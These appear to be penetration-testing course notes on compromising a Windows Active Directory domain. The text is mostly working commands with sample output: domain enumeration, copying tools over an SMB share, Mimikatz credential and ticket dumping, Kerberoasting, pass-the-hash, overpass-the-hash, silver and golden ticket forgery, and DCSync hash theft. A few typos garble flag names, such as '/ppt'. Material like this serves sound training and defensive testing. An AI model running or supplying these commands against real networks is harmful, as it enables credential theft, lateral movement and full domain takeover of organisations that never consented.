- Just landed on a box?
whoami /priv
Enumerate all local accounts:
net user
Enumerate all users in the entire domain:
net user /domain
net user jeff_admin /domain
Enumerate all groups in the domain:
net group /domain
Transfer Tools to compromised host
Kali:
impacket-smbserver smb .
Windows:
net use \\kali-ip\smb
copy \\kali-ip\smb\PowerView.ps1 .
dir
PowerView.ps1
Import module:
Import-Module .\PowerView.ps1
Enumerate logged-in users:
Get-NetLoggedon -ComputerName client251
Enumerate all active sessions:
Get-NetSession -ComputerName dc01
- Look for default passwords!
LDAPSEARCH:
ldapsearch -H ldap://<IP> -x -b "dc=hack,dc=local" > domainUsers.txt
grep "sAMAccountName" domainUsers.txt > users.txt
awk -F":" '{print $2}' users.txt | tail -n 20 > valid_ad_users
- An alternative to attacking a domain user account is to target so-called service accounts
- It is very possible that they are members of high-value groups
PowerShell script used to detect registered service principal names:
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain
$Searcher.filter="serviceprincipalname=*http*"
$Result = $Searcher.FindAll()
Foreach($obj in $Result)
{
Foreach($prop in $obj.Properties)
{
$prop
}
}
- NTLM is used when a client authenticates to a server by IP address instead of hostname
- Kerberos authentication involves the usage of a Domain Controller that is in the role of a Key Distribution Center (KDC).
- Kerberos makes use of SSO password hashes
- These hashes are stored in memory space known as Local Security Authority Subsystem Service (LSASS) memory space
- If we are able to gain access to these hashes, we could take them offline and crack them to obtain the cleartext password or reuse them to perform various actions
- Transfer Mimikatz to the Windows host through our SMB server
- We will be running Mimikatz locally
- If it is acting up, it may be due to an Evil-WinRM shell
- Attempt another reverse shell if possible
Usage:
.\Mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
- This should dump the credentials of all logged-on users using the Sekurlsa module
- Armed with hashes? Crack them offline and pass them around the network.
Dumping tickets in memory:
sekurlsa::tickets
- If you get a TGT or TGS, this would allow you to access particular resources associated with those tickets
- Also, if you are armed with a TGT ticket, you could request a TGS for specific resources you want to target within the domain
kerberos::list /export
1-40a50000-offsec@HTTP~CorpWebServer.corp.com-CORP.COM.kirbi
tgsrepcrack.py
impacket-GetUserSPNs
hashcat
- Locate high-value targets
- Find workstations or servers that these targets are logged into
- Gather password hashes
- Recover existing tickets
- Leverage them for Kerberos Authentication
Do all of the above in order to use lateral movement to compromise other machines within the domain.
A logical step would be to crack any password hashes that you may have obtained and authenticate to a machine with cleartext passwords to gain access.
Can we pass the hash if password cracking is not possible?
Pass the Hash (PTH) is a technique that allows an attacker to authenticate to a remote system or service using a user's NTLM hash instead of the associated plaintext password.
Use these tools to PTH:
- PsExec
- Metasploit
- Impacket
- Passing-the-Hash Toolkit
PTH Toolkit:
pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e
//10.11.0.22 cmd
This method can be used to over abuse an NTLM user hash to gain a full Kerberos Ticket Granting Ticket (TGT) or service ticket.
This will in return grant us access to another machine or service as that user.
We can verify this with mimikatz:
sekurlsa::logonpasswords
- This will display cached credentials
- NTLM hash
- We can then leverage this to overpass the hash
Our goal is to turn the NTLM hash into a Kerberos ticket and avoid the use of NTLM authentication.
We can do this will sekurlsa::pth from mimikatz:
sekurlsa::pth /user:jeff_admin /domain:corp.com
/ntlm:e2b475c11da2a0748290d87aa966c327 /run:PowerShell.exe
- Now that we have a new PowerShell session, we can execute commands as this user.
List cached Kerberos tickets:
klist
#if there are none, generate some by authenticating to the network share
net use \\hostname
klist
It is possible for PsExec to run a command remotely but does not accept password hashes.
This is possible with a generated Kerberos hash. We can then reuse this TGT to obtain code execution on the DC.
By running PsExec to launch cmd.exe remotely on a remote machine as a high privileged user:
.\PsExec.exe \\dc01 cmd.exe
C:\Windows\System32>
The Pass the Ticket attack takes advantage of the TGS, which may be exported and re-injected elsewhere on the network.
It can then be used to authenticate to a service.
If the service tickets belong to the current user, no administrative privileges are required.
Mimikatz can craft a silver ticket and inject it into memory using the kerberos::golden command
- Yes, the syntax is misleading.
To create a ticket, we need the Security Identifier or SID of the domain.
Example of SID:
S-1-5-21-2536614405-3629634762-1218571035-1116
We can easily find the SID of our current user with the whoami /user command and extract the domain SID part of it.
whoami /user
SID
S-1-5-21-2536614405-3629634762-1218571035-1116
Now that we have the domain SID, let's craft a silver ticket for the IIS service
- The silver ticket command requires a username /user
2. Domain name /domain
3. Domain SID /sid
4. Fully qualified host name of the service /target
5. Service rtpe /service:HTTP
6. Password hash of service account /rc4
Finally, the silver ricket is injected into memory with the /ppt flag.
Before running this, we will flush any existing Kerberos tickets with kerberos::purge and verify the purge with kerberos::list
Mimikatz:
kerberos::purge
Ticket(s) purge for current session is ok
kerberos::list
kerberos::golden /user:offsec /domain:corp.com /sid:S-1-5-21-1602875587-
2787523311-2599479668 /target:CorpWebServer.corp.com /service:HTTP
/rc4:E2B475C11DA2A0748290D87AA966C327 /ptt
kerberos::list
- To create a silver ticket, we use the password hash and not the cleartext password
- If a Kerberoast session presented us with the cleartext password, we must hash it before using it to generate a silver ticket
- Now that we have this ticket loaded into memory, we can interact with the service and gain access to any information on the group memberships we put in the silver ticket
- Depending on the service type, it might also be possible to obtain code execution
- When a user submits a request for a TGT, the KDC encrypts the TGT with a secret key that is known only to the KDC's in the domain
- This secret key is actually the password of a domain user account called krbtgt
- If we are able to gain access to the krbtgt hash, we can create our own TGT or golden tickets!
- For example, we could create a TGT stating that a non-privileged user is actually a member of the Domain Admins Group and the domain controller will trust it!
You need to have compromised a member within the Domain Admins group or the Domain Controller itself.
With this kind of access, we can extract the password hash of the krbtgt account with Mimikatz.
privilege::debug
OK
lsadump::lsa /patch
User: krbtgt
NTLM: 75b60230a2394a812000dbfad8415965
- Remember, you are after the NTLM hash for the krbtgt account!
Fun fact:
Creating the golden ticket and injecting it into memory does not require any administrative privileges, and can even be performed from a computer that is not joined to the domain.
- Before generating the golden ticket, delete any existing Kerberos tickets with kerberos::purge
- We need to supply the domain SID (we can obtain with whoami /user) to the Mimikatz kerberos::golden
- This will create the golden ticket
- Be sure to use the /krbtgt to indicate that you are supplying the hash
- You can set the golden ticket's username to anything such as fakeuser in this
- This is because the DC will trust anything that is encrypted by the krbtgt password hash
kerberos::purge
kerberos::golden /user:fakeuser /domain:corp.com /sid:S-1-5-21-1602875587-
2787523311-2599479668 /krbtgt:75b60230a2394a812000dbfad8415965 /ptt
Upon success, you will see:
Golden ticket for 'fakeuser @ corp.com' successfully submitted for current session
misc::cmd
With the golden ticket injected into memory, we can launch a new command prompt with misc::cmd and again attempt lateral movement with PsExec
psexec.exe \\dc01 cmd.exe
C:\Windows\System32>
Another way to achieve persistence in an AD infrastructure is to steal the password hashes for all administrative users in the domain.
To do this, we could laterally move to the DC and run Mimikatz to dump the password hash of every user.
We could also steal a copy of the NTDS.dit database file which is a copy of all AD accounts stored on the hard drive. Similar to the SAM database used for local accounts.
Mimikatz usage:
lsadump::dcsync /user:Administrator
Hash NTLM: e2b475c11da2a0748290d87aa966c327